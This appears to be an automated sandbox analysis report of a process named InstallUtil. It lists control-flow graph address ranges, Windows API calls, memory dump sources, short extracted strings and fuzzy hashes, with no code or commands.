                                                                                control_flow_graph 1050 569c4b8-569c547 GetCurrentProcess 1054 569c549-569c54f 1050->1054 1055 569c550-569c584 GetCurrentThread 1050->1055 1054->1055 1056 569c58d-569c5c1 GetCurrentProcess 1055->1056 1057 569c586-569c58c 1055->1057 1058 569c5ca-569c600 call 569afd4 1056->1058 1059 569c5c3-569c5c9 1056->1059 1057->1056 1065 569c6ab-569c75c DuplicateHandle 1058->1065 1066 569c606-569c63f call 56924c0 GetCurrentThreadId 1058->1066 1059->1058 1070 569c75e-569c764 1065->1070 1071 569c765-569c782 1065->1071 1072 569c648-569c6aa 1066->1072 1073 569c641-569c647 1066->1073 1070->1071 1073->1072
                                                                                APIs
                                                                                • GetCurrentProcess.KERNEL32 ref: 0569C536
                                                                                • GetCurrentThread.KERNEL32 ref: 0569C573
                                                                                • GetCurrentProcess.KERNEL32 ref: 0569C5B0
                                                                                • GetCurrentThreadId.KERNEL32 ref: 0569C62E
                                                                                • DuplicateHandle.KERNELBASE(00000000,00000000,05678F9C,?,00000000,056903F4,00000000,?,?,?,?), ref: 0569C74F
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1514543830.0000000005690000.00000040.00000800.00020000.00000000.sdmp, Offset: 05690000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_5690000_InstallUtil.jbxd
                                                                                Similarity
                                                                                • API ID: Current$ProcessThread$DuplicateHandle
                                                                                • String ID:
                                                                                • API String ID: 4285418203-0
                                                                                • Opcode ID: fefcec830068ab39726d05dc0143cfda43e61018b096fa4af8089be75aa50165
                                                                                • Instruction ID: bef0210d23d4022936e52089ab85017ebad157488ccc54d192b59963f47547eb
                                                                                • Opcode Fuzzy Hash: fefcec830068ab39726d05dc0143cfda43e61018b096fa4af8089be75aa50165
                                                                                • Instruction Fuzzy Hash: 159134B5D002499FEB14CFAAD588B9EBBF5FF48314F20801AE419A7360D774A845CF65

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 1081 4c3f708-4c3f754 1085 4c3f8d2-4c3f90e 1081->1085 1086 4c3f75a-4c3f76c 1081->1086 1089 4c3f76e-4c3f7ba 1086->1089 1090 4c3f7bc-4c3f805 1086->1090 1106 4c3f808-4c3f81c 1089->1106 1090->1106 1107 4c3f827-4c3f848 1106->1107 1111 4c3f852-4c3f85c 1107->1111 1112 4c3f84a-4c3f850 1107->1112 1113 4c3f85f-4c3f8a2 1111->1113 1112->1113 1120 4c3f8a4-4c3f8c0 1113->1120 1121 4c3f8c8-4c3f8cf 1113->1121 1120->1121
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1492938579.0000000004C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C30000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_4c30000_InstallUtil.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: (q$4'q$4'q$4'q$4'q$pq
                                                                                • API String ID: 0-2944075406
                                                                                • Opcode ID: 73a753a3f8999a042f0b77156a7d0b2f07cea10a43b35c1c6254a1fd0c1eae60
                                                                                • Instruction ID: c35cbbb24f6c8cb4413a9156ea7f3c3a842545d4450bfeb270ca1de4a342f851
                                                                                • Opcode Fuzzy Hash: 73a753a3f8999a042f0b77156a7d0b2f07cea10a43b35c1c6254a1fd0c1eae60
                                                                                • Instruction Fuzzy Hash: 8051AE30E003059FDB59EB79E8517AFB7E3AFC9300F14882DD44A9B755DB34A90687A2

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 1124 569c4a8-569c547 GetCurrentProcess 1128 569c549-569c54f 1124->1128 1129 569c550-569c584 GetCurrentThread 1124->1129 1128->1129 1130 569c58d-569c5c1 GetCurrentProcess 1129->1130 1131 569c586-569c58c 1129->1131 1132 569c5ca-569c5ef call 569afd4 1130->1132 1133 569c5c3-569c5c9 1130->1133 1131->1130 1138 569c5f4-569c600 1132->1138 1133->1132 1139 569c6ab 1138->1139 1140 569c606-569c63f call 56924c0 GetCurrentThreadId 1138->1140 1142 569c6b0-569c75c DuplicateHandle 1139->1142 1146 569c648-569c6aa 1140->1146 1147 569c641-569c647 1140->1147 1144 569c75e-569c764 1142->1144 1145 569c765-569c782 1142->1145 1144->1145 1147->1146
                                                                                APIs
                                                                                • GetCurrentProcess.KERNEL32 ref: 0569C536
                                                                                • GetCurrentThread.KERNEL32 ref: 0569C573
                                                                                • GetCurrentProcess.KERNEL32 ref: 0569C5B0
                                                                                • GetCurrentThreadId.KERNEL32 ref: 0569C62E
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1514543830.0000000005690000.00000040.00000800.00020000.00000000.sdmp, Offset: 05690000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_5690000_InstallUtil.jbxd
                                                                                Similarity
                                                                                • API ID: Current$ProcessThread
                                                                                • String ID:
                                                                                • API String ID: 2063062207-0
                                                                                • Opcode ID: 1b4ae9165b0645fb93cdb67d1ca6f45873b3061c23aa0cc219ec018f2290bc29
                                                                                • Instruction ID: d98f581fd714a7b6c9c8c47e368b0bcebc917f6eafb6b1a384d395981e2eedc6
                                                                                • Opcode Fuzzy Hash: 1b4ae9165b0645fb93cdb67d1ca6f45873b3061c23aa0cc219ec018f2290bc29
                                                                                • Instruction Fuzzy Hash: A75138B0D002099FEB18DFA9D588B9EBBF5BF48314F10C41AE419AB360D774A845CF65

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 1302 4978f18-4978f51 1305 4978fc7-4978fec 1302->1305 1306 4978f53-4978f5f 1302->1306 1310 4978ff3-4979058 1305->1310 1309 4978f65-4978f7b 1306->1309 1306->1310 1317 4978f8e-4978faa 1309->1317 1318 4978f7d-4978f8c 1309->1318 1328 4979080-497908e 1310->1328 1329 497905a-497905c 1310->1329 1324 4978fb4 1317->1324 1325 4978fac-4978fb2 1317->1325 1318->1317 1327 4978fb8-4978fc4 1324->1327 1325->1327 1337 49790c3-49790ce 1328->1337 1338 4979090-497909e 1328->1338 1330 4979062-4979067 1329->1330 1331 49790fb-4979120 1329->1331 1334 4979071-497907d 1330->1334 1335 4979069-497906b 1330->1335 1336 4979127-497914b 1331->1336 1335->1334 1335->1336 1351 4979152-49791a5 1336->1351 1345 49790d0-49790f4 1337->1345 1346 49790bc-49790c0 1337->1346 1347 49790b4-49790b6 1338->1347 1348 49790a0-49790b1 call 49729e0 1338->1348 1345->1331 1347->1346 1347->1351 1362 49791a7-49791bd 1351->1362 1363 4979200-4979252 1351->1363 1368 49791d5-49791ed 1362->1368 1369 49791bf-49791c7 1362->1369 1377 4979254-497925a 1363->1377 1378 497926a-4979282 1363->1378 1374 49791ef 1368->1374 1375 49791f8-49791fd 1368->1375 1371 49791cd-49791d2 1369->1371 1374->1375 1379 497925e-4979260 1377->1379 1380 497925c 1377->1380 1379->1378 1380->1378
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1491149297.0000000004970000.00000040.00000800.00020000.00000000.sdmp, Offset: 04970000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_4970000_InstallUtil.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: (q$(q$(q$Hq
                                                                                • API String ID: 0-564500637
                                                                                • Opcode ID: 1c5e90aeb7c4a9b5a015a888257b94deea864fe9eecfdf254b60313dbe952472
                                                                                • Instruction ID: 0e9ba440397229688412d447da835268a2441e4ad1dc96bbc78f0b90963369fa
                                                                                • Opcode Fuzzy Hash: 1c5e90aeb7c4a9b5a015a888257b94deea864fe9eecfdf254b60313dbe952472
                                                                                • Instruction Fuzzy Hash: 909124317042104FE716AB78A890B6E7BA7EFC6310B1885BED509CF392DE319C06C7A5

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 1383 497073a-4970763 1384 4970769-497077b 1383->1384 1386 4970784-4970787 1384->1386 1387 497077d 1384->1387 1388 4970ded-4970df9 1386->1388 1389 497078d-4970790 1386->1389 1387->1386 1390 4970e07-4970e30 1388->1390 1391 4970dfb-4970dfd 1388->1391 1392 4970796-49707a2 1389->1392 1393 4970f64-497100d 1389->1393 1398 4970e36-4970e38 1390->1398 1399 4970e32-4970e34 1390->1399 1391->1390 1394 49707a4-49707a6 1392->1394 1395 49707b0-49707f1 1392->1395 1394->1395 1407 4970f5a-4970f61 1395->1407 1403 4970e3f-4970e41 1398->1403 1399->1398 1402 4970e3a 1399->1402 1402->1403 1404 4970e43-4970e6b 1403->1404 1405 4970e6d-4970ea5 1403->1405 1417 4970eac-4970ec9 1404->1417 1405->1417 1417->1407
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1491149297.0000000004970000.00000040.00000800.00020000.00000000.sdmp, Offset: 04970000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_4970000_InstallUtil.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: (_q$(_q$(_q$(_q
                                                                                • API String ID: 0-1088526261
                                                                                • Opcode ID: 4fe02367d689ba20f7b50c39b8ab7e30a551d2edb8d2c028de43b0aef6a81325
                                                                                • Instruction ID: 6bb40e7efb8a448bc67bd35250a2b22bc2d588695a30dc47bac1311b2640e9d6
                                                                                • Opcode Fuzzy Hash: 4fe02367d689ba20f7b50c39b8ab7e30a551d2edb8d2c028de43b0aef6a81325
                                                                                • Instruction Fuzzy Hash: 4761B275F042058FCB05DF78D4955AEBFB2EF86304B148969D4469B362EB31ED42CB81

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 1614 49792c0-49792d2 1616 49793c5-49793ea 1614->1616 1617 49792d8-49792dc 1614->1617 1619 49793f1-49794c5 1616->1619 1618 49792e2-49792e6 1617->1618 1617->1619 1620 49794cc-49794f0 1618->1620 1621 49792ec-49792f1 1618->1621 1619->1620 1638 49794f7-4979576 1620->1638 1624 49792f3-497930f 1621->1624 1625 497931f-4979322 1621->1625 1728 4979311 call 4979560 1624->1728 1729 4979311 call 49792c0 1624->1729 1730 4979311 call 4979288 1624->1730 1628 4979324-4979328 1625->1628 1629 497934e-49793be 1625->1629 1630 497933a-497934b 1628->1630 1631 497932a-497932e 1628->1631 1629->1616 1631->1630 1634 4979330-4979334 1631->1634 1633 4979317-497931c 1634->1630 1634->1638 1663 49795a8-49795aa 1638->1663 1664 4979578-497957c 1638->1664 1668 49795ad-49795c6 1663->1668 1665 4979594-497959f 1664->1665 1666 497957e-4979592 1664->1666 1665->1663 1666->1663 1666->1665 1669 497960f-4979642 1668->1669 1670 49795c8-49795d8 1668->1670 1676 4979644-4979648 1669->1676 1677 4979688-49796ad 1669->1677 1670->1668 1673 49795da-49795e4 1670->1673 1673->1669 1675 49795e6-497960e 1673->1675 1679 49796b4-4979700 1676->1679 1680 497964a-4979678 call 4979ad0 1676->1680 1677->1679 1694 4979706-4979710 1679->1694 1695 4979860-4979885 1679->1695 1692 497967e-4979685 1680->1692 1696 4979712 1694->1696 1697 497971a-497971e 1694->1697 1699 497988c-49798b0 1695->1699 1696->1697 1698 4979724-497972c 1697->1698 1697->1699 1701 4979732 1698->1701 1702 4979851-4979859 1698->1702 1711 49798b7-49798f7 1699->1711 1701->1702 1704 49797d5-49797db 1701->1704 1705 497975b-4979770 1701->1705 1706 4979739-4979758 1701->1706 1702->1695 1704->1711 1712 49797e1-49797ef 1704->1712 1708 4979772-4979776 1705->1708 1709 49797a1-49797d2 1705->1709 1716 4979790-4979799 1708->1716 1717 4979778-497978e 1708->1717 1713 49797f1-49797f5 1712->1713 1714 4979820-497984e 1712->1714 1719 49797f7-497980d 1713->1719 1720 497980f-4979818 1713->1720 1716->1709 1717->1709 1717->1716 1719->1714 1719->1720 1720->1714 1728->1633 1729->1633 1730->1633
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1491149297.0000000004970000.00000040.00000800.00020000.00000000.sdmp, Offset: 04970000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_4970000_InstallUtil.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: (q$(q$(q
                                                                                • API String ID: 0-2103260149
                                                                                • Opcode ID: 051e2998e719a6384ac9c88652c83d80bfe9fc52b32a0397f4c8ba41cf28ef20
                                                                                • Instruction ID: 9bc1eb05a8a130204409ab3004fe51eaa4904634eef0b515b5fdbe428c52ea5b
                                                                                • Opcode Fuzzy Hash: 051e2998e719a6384ac9c88652c83d80bfe9fc52b32a0397f4c8ba41cf28ef20
                                                                                • Instruction Fuzzy Hash: 8812BE74B006158FD714DF68D494AAEBBF2FFC9300B148A6ED44ADB791DA34E902CB94

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 1731 4c3e440-4c3e468 1733 4c3e4b6-4c3e4c4 1731->1733 1734 4c3e46a-4c3e4b1 1731->1734 1735 4c3e4d3 1733->1735 1736 4c3e4c6-4c3e4d1 call 4c3b3c8 1733->1736 1782 4c3e90d-4c3e914 1734->1782 1738 4c3e4d5-4c3e4dc 1735->1738 1736->1738 1741 4c3e4e2-4c3e4e6 1738->1741 1742 4c3e5c5-4c3e5c9 1738->1742 1745 4c3e915-4c3e93d 1741->1745 1746 4c3e4ec-4c3e4f0 1741->1746 1743 4c3e5cb-4c3e5da call 4c39580 1742->1743 1744 4c3e61f-4c3e629 1742->1744 1759 4c3e5de-4c3e5e3 1743->1759 1751 4c3e662-4c3e688 1744->1751 1752 4c3e62b-4c3e63a call 4c38d08 1744->1752 1755 4c3e944-4c3e96e 1745->1755 1749 4c3e502-4c3e560 call 4c3b108 call 4c3bb70 1746->1749 1750 4c3e4f2-4c3e4fc 1746->1750 1792 4c3e9d3-4c3e9e8 1749->1792 1793 4c3e566-4c3e5c0 1749->1793 1750->1749 1750->1755 1778 4c3e695 1751->1778 1779 4c3e68a-4c3e693 1751->1779 1763 4c3e640-4c3e65d 1752->1763 1764 4c3e976-4c3e980 1752->1764 1755->1764 1765 4c3e5e5-4c3e61a call 4c3e310 1759->1765 1766 4c3e5dc 1759->1766 1763->1782 1783 4c3e983-4c3e98c 1764->1783 1765->1782 1766->1759 1785 4c3e697-4c3e6bf 1778->1785 1779->1785 1796 4c3e994-4c3e9cc 1783->1796 1797 4c3e790-4c3e794 1785->1797 1798 4c3e6c5-4c3e6de 1785->1798 1792->1783 1801 4c3e9ea-4c3e9fd 1792->1801 1793->1782 1796->1792 1802 4c3e796-4c3e7af 1797->1802 1803 4c3e80e-4c3e818 1797->1803 1798->1797 1823 4c3e6e4-4c3e6f3 call 4c38ca0 1798->1823 1809 4c3ea07-4c3ea0d 1801->1809 1810 4c3e9ff-4c3ea05 1801->1810 1802->1803 1828 4c3e7b1-4c3e7c0 call 4c38ca0 1802->1828 1806 4c3e875-4c3e87e 1803->1806 1807 4c3e81a-4c3e824 1803->1807 1813 4c3e880-4c3e8ae call 4c3a900 call 4c3a920 1806->1813 1814 4c3e8b6-4c3e905 call 4c3ec80 1806->1814 1824 4c3e826-4c3e828 1807->1824 1825 4c3e82a-4c3e83c 1807->1825 1810->1809 1815 4c3ea0e-4c3ea4b 1810->1815 1813->1814 1833 4c3e90b 1814->1833 1842 4c3e6f5-4c3e6fb 1823->1842 1843 4c3e70b-4c3e720 1823->1843 1830 4c3e83e-4c3e840 1824->1830 1825->1830 1850 4c3e7c2-4c3e7c8 1828->1850 1851 4c3e7d8-4c3e7e3 1828->1851 1839 4c3e842-4c3e846 1830->1839 1840 4c3e86e-4c3e873 1830->1840 1833->1782 1845 4c3e864-4c3e869 call 4c37aa0 1839->1845 1846 4c3e848-4c3e861 1839->1846 1840->1806 1840->1807 1852 4c3e6ff-4c3e701 1842->1852 1853 4c3e6fd 1842->1853 1856 4c3e722-4c3e74e call 4c39a50 1843->1856 1857 4c3e754-4c3e75d 1843->1857 1845->1840 1846->1845 1860 4c3e7ca 1850->1860 1861 4c3e7cc-4c3e7ce 1850->1861 1851->1792 1862 4c3e7e9-4c3e80c 1851->1862 1852->1843 1853->1843 1856->1796 1856->1857 1857->1792 1859 4c3e763-4c3e78a 1857->1859 1859->1797 1859->1823 1860->1851 1861->1851 1862->1803 1862->1828
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1492938579.0000000004C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C30000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_4c30000_InstallUtil.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: Hq$Hq$Hq
                                                                                • API String ID: 0-2505839570
                                                                                • Opcode ID: 41a59332a5c08593c8b3e82065b35cfe36691826eb31d9c8a7fff6a20fa64caa
                                                                                • Instruction ID: 6b2c16d45d041ea3f459c1b5e6cfc0032b8fb4ef8c730f00c973c6d6df4c8b0a
                                                                                • Opcode Fuzzy Hash: 41a59332a5c08593c8b3e82065b35cfe36691826eb31d9c8a7fff6a20fa64caa
                                                                                • Instruction Fuzzy Hash: 97125974A002188FDB25DFA5C484AAEB7F7BF88305F14892DE50A9B351DB31ED46CB90

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 1978 4971ab0-4971ad0 1979 4971ad6-4971ada 1978->1979 1980 4971be9-4971c0e 1978->1980 1981 4971c15-4971c3a 1979->1981 1982 4971ae0-4971ae9 1979->1982 1980->1981 1983 4971c41-4971c77 1981->1983 1982->1983 1984 4971aef-4971b16 1982->1984 2001 4971c7e-4971cd4 1983->2001 1995 4971bde-4971be8 1984->1995 1996 4971b1c-4971b1e 1984->1996 1998 4971b20-4971b23 1996->1998 1999 4971b3f-4971b41 1996->1999 1998->2001 2002 4971b29-4971b33 1998->2002 2000 4971b44-4971b48 1999->2000 2005 4971b4a-4971b59 2000->2005 2006 4971ba9-4971bb5 2000->2006 2018 4971cd6-4971cea call 4971f8a 2001->2018 2019 4971cf8-4971d0f 2001->2019 2002->2001 2004 4971b39-4971b3d 2002->2004 2004->1999 2004->2000 2005->2001 2011 4971b5f-4971ba6 2005->2011 2006->2001 2007 4971bbb-4971bd8 2006->2007 2007->1995 2007->1996 2011->2006 2078 4971ced call 4972042 2018->2078 2079 4971ced call 49721d0 2018->2079 2080 4971ced call 4972330 2018->2080 2081 4971ced call 4972048 2018->2081 2082 4971ced call 49722a8 2018->2082 2028 4971d15-4971dfa call 4971020 call 49703e8 2019->2028 2029 4971dff-4971e0f 2019->2029 2025 4971cf3 2027 4971f21-4971f2c 2025->2027 2033 4971f2e-4971f3e 2027->2033 2034 4971f5b-4971f7c 2027->2034 2028->2029 2035 4971e15-4971eee call 4971020 2029->2035 2036 4971efc-4971f18 2029->2036 2044 4971f40-4971f46 2033->2044 2045 4971f4e-4971f54 2033->2045 2074 4971ef0 2035->2074 2075 4971ef9 2035->2075 2036->2027 2044->2045 2045->2034 2074->2075 2075->2036 2078->2025 2079->2025 2080->2025 2081->2025 2082->2025
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1491149297.0000000004970000.00000040.00000800.00020000.00000000.sdmp, Offset: 04970000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_4970000_InstallUtil.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: (q$(q$Hq
                                                                                • API String ID: 0-2914423630
                                                                                • Opcode ID: dba428cb8ca710e666e47ca91f62ea766dc32348d5bfae496a9eac9810b64d85
                                                                                • Instruction ID: f83a75e73e63def9e323b783d380739cc9c3578d58f673dee4c1509b707f25e4
                                                                                • Opcode Fuzzy Hash: dba428cb8ca710e666e47ca91f62ea766dc32348d5bfae496a9eac9810b64d85
                                                                                • Instruction Fuzzy Hash: E5E15134A00209DFDB14EFA4E49599EBBB2FFC9304F148569E805AB365DB30ED46CB91

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 2083 6753360-6753384 2085 6753389-675338c 2083->2085 2086 67534a5-67534ae 2085->2086 2087 6753392 2085->2087 2087->2086 2088 6753485-6753487 2087->2088 2089 67534e4-675351a 2087->2089 2090 67533a3-67533a5 2087->2090 2091 67533cd-6753470 call 6753300 * 2 2087->2091 2092 6753399-67533a2 2087->2092 2093 675352a-6753544 call 6753300 2087->2093 2094 67534ba-67534ca 2087->2094 2088->2089 2095 6753489-6753497 2088->2095 2089->2092 2120 6753520-6753525 2089->2120 2096 67533a7-67533ad 2090->2096 2097 67533c1 2090->2097 2128 6753478-6753480 2091->2128 2129 6753549 call 6753610 2093->2129 2130 6753549 call 6753600 2093->2130 2108 67534cc-67534d7 2094->2108 2109 67534af-67534b9 2094->2109 2095->2085 2099 675349d-67534a0 2095->2099 2100 67533b3-67533b5 2096->2100 2101 67533af-67533b1 2096->2101 2104 67533c3-67533cb 2097->2104 2099->2085 2107 67533bf 2100->2107 2101->2107 2104->2085 2107->2104 2108->2085 2112 67534dd-67534df 2108->2112 2111 675354f-675355f 2111->2085 2115 6753565-675356a 2111->2115 2112->2085 2115->2085 2120->2085 2128->2085 2129->2111 2130->2111
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1522784487.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_6750000_InstallUtil.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: $q$$q$$q
                                                                                • API String ID: 0-3067366958
                                                                                • Opcode ID: 09a9a2459fd256916d23c0fd1c64bf84c056514a74395ed1c4f057bcf9e0a1df
                                                                                • Instruction ID: d0c06cf2ee920c279280738e7c90abdadc898f49d11277247853657807a374d0
                                                                                • Opcode Fuzzy Hash: 09a9a2459fd256916d23c0fd1c64bf84c056514a74395ed1c4f057bcf9e0a1df
                                                                                • Instruction Fuzzy Hash: 7D515230B001158FE755E7A6E85877BF3E7EBC4250F15C0AAD90AC7368EEB498018795
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1523033917.00000000067F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067F0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_67f0000_InstallUtil.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: $q$$q$$q
                                                                                • API String ID: 0-3067366958
                                                                                • Opcode ID: ef11419b88033c7d957aa8484ba9427ba093f90e6a91c0fa63a63aaef34fc9ff
                                                                                • Instruction ID: 67ba8055ec00cf35970e8a84a79f541d28ff98d16f75083b60eaa107466525a7
                                                                                • Opcode Fuzzy Hash: ef11419b88033c7d957aa8484ba9427ba093f90e6a91c0fa63a63aaef34fc9ff
                                                                                • Instruction Fuzzy Hash: 3D419F35B102018FE7A5EB65E468A79B3E2EF89300F558069EA0687399DF749C02C781
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1522784487.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_6750000_InstallUtil.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: $q$$q$$q
                                                                                • API String ID: 0-3067366958
                                                                                • Opcode ID: 8bb84651043a256abd5143214dd150d6a436e4fe1cee93d89b88a3fd56bbddd4
                                                                                • Instruction ID: f2540ffbcdcc9e34d191c5d84ed35517fce183474688464c71e643ca6ead9eaf
                                                                                • Opcode Fuzzy Hash: 8bb84651043a256abd5143214dd150d6a436e4fe1cee93d89b88a3fd56bbddd4
                                                                                • Instruction Fuzzy Hash: A7310571B042058FE794D665E84477BB3E6F7C52A9F16C1BAC849872A8FFB19C0187D0
                                                                                APIs
                                                                                • KiUserCallbackDispatcher.NTDLL(00000050), ref: 05690DC3
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1514543830.0000000005690000.00000040.00000800.00020000.00000000.sdmp, Offset: 05690000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_5690000_InstallUtil.jbxd
                                                                                Similarity
                                                                                • API ID: CallbackDispatcherUser
                                                                                • String ID: 4'q
                                                                                • API String ID: 2492992576-1807707664
                                                                                • Opcode ID: ef071fad21a63ae6fbbd0d9662593cafa11c97b03665b4e0617565f650b86c26
                                                                                • Instruction ID: 9f9b382bedca9edb4ec38346f5c754400728c2e665205cc6cb9392c80b99be74
                                                                                • Opcode Fuzzy Hash: ef071fad21a63ae6fbbd0d9662593cafa11c97b03665b4e0617565f650b86c26
                                                                                • Instruction Fuzzy Hash: E82154B5D002198FCB14CFA9E9497EEBBB4FB48321F10841AE819B7381D7386945CFA5
                                                                                APIs
                                                                                • KiUserCallbackDispatcher.NTDLL(00000050), ref: 05690DC3
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1514543830.0000000005690000.00000040.00000800.00020000.00000000.sdmp, Offset: 05690000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_5690000_InstallUtil.jbxd
                                                                                Similarity
                                                                                • API ID: CallbackDispatcherUser
                                                                                • String ID: 4'q
                                                                                • API String ID: 2492992576-1807707664
                                                                                • Opcode ID: ba9a15a9a1a191c4fc3dd4638f43ab4387d6c44cc95d2710b378eb61ba64c1b5
                                                                                • Instruction ID: baea8354699ec65a0b0a64ed09a7bf0784ca911f381c51fabf5ba2d9c1f39e17
                                                                                • Opcode Fuzzy Hash: ba9a15a9a1a191c4fc3dd4638f43ab4387d6c44cc95d2710b378eb61ba64c1b5
                                                                                • Instruction Fuzzy Hash: 562134B4D042198FCB14DFA9E9456EEBBF4FB48320F10851AD819B7381C7386945CFA5
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1510276933.0000000005520000.00000040.00000800.00020000.00000000.sdmp, Offset: 05520000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_5520000_InstallUtil.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 2$$q
                                                                                • API String ID: 0-2017333547
                                                                                • Opcode ID: 6e94ff75da27b71d734085e34a47979a0bec51fcfb281a90822e56a2db51ebe2
                                                                                • Instruction ID: 76fb28923500594a130b33075538e4347c82c43ee18400d1d7e514a40ea4a8fe
                                                                                • Opcode Fuzzy Hash: 6e94ff75da27b71d734085e34a47979a0bec51fcfb281a90822e56a2db51ebe2
                                                                                • Instruction Fuzzy Hash: 3C721874A002188FDB55EF65E8947AEB7F6FB89300F2089A9D40AD7398DB30AD51CF51
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1452571742.00000000023D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023D0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_23d0000_InstallUtil.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 2$$q
                                                                                • API String ID: 0-2017333547
                                                                                • Opcode ID: a822ab66e98087060930f43b4bd214c56de13321974bd3295b3213e7a919fb88
                                                                                • Instruction ID: d640e4f4f65554cf4aa6dad072c4b6e3e67fd7427a639e3be9a4904dc5ea5f6c
                                                                                • Opcode Fuzzy Hash: a822ab66e98087060930f43b4bd214c56de13321974bd3295b3213e7a919fb88
                                                                                • Instruction Fuzzy Hash: BA424A74A00215CFDB68DF69E580BADB7F2BB89700F2081A9D409DB765DB30AD86CF51
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1492938579.0000000004C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C30000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_4c30000_InstallUtil.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: (q$d
                                                                                • API String ID: 0-1617062230
                                                                                • Opcode ID: 296d043b89f1f12122de20ed36941a77433af9d9fc01beab3a9156f397e16f6a
                                                                                • Instruction ID: ce60bf09ec98c8549b4af6e7f406d977a376b51f4260a66d01b315ea046ee1d0
                                                                                • Opcode Fuzzy Hash: 296d043b89f1f12122de20ed36941a77433af9d9fc01beab3a9156f397e16f6a
                                                                                • Instruction Fuzzy Hash: D5D15C347006068FDB14DF68C484AAAB7F3FF88315B158969E45A9B7A1DB30FD46CB90
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1492938579.0000000004C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C30000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_4c30000_InstallUtil.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: Hq$Hq
                                                                                • API String ID: 0-925789375
                                                                                • Opcode ID: 5930fb064655cb756f573a85dc04c437d62ae48d3886eed1f6abc9a42abe6ece
                                                                                • Instruction ID: df39101a7f17eeea6b451f5ca8076fbd1f776a188206a5f0f6d4338beb90baf6
                                                                                • Opcode Fuzzy Hash: 5930fb064655cb756f573a85dc04c437d62ae48d3886eed1f6abc9a42abe6ece
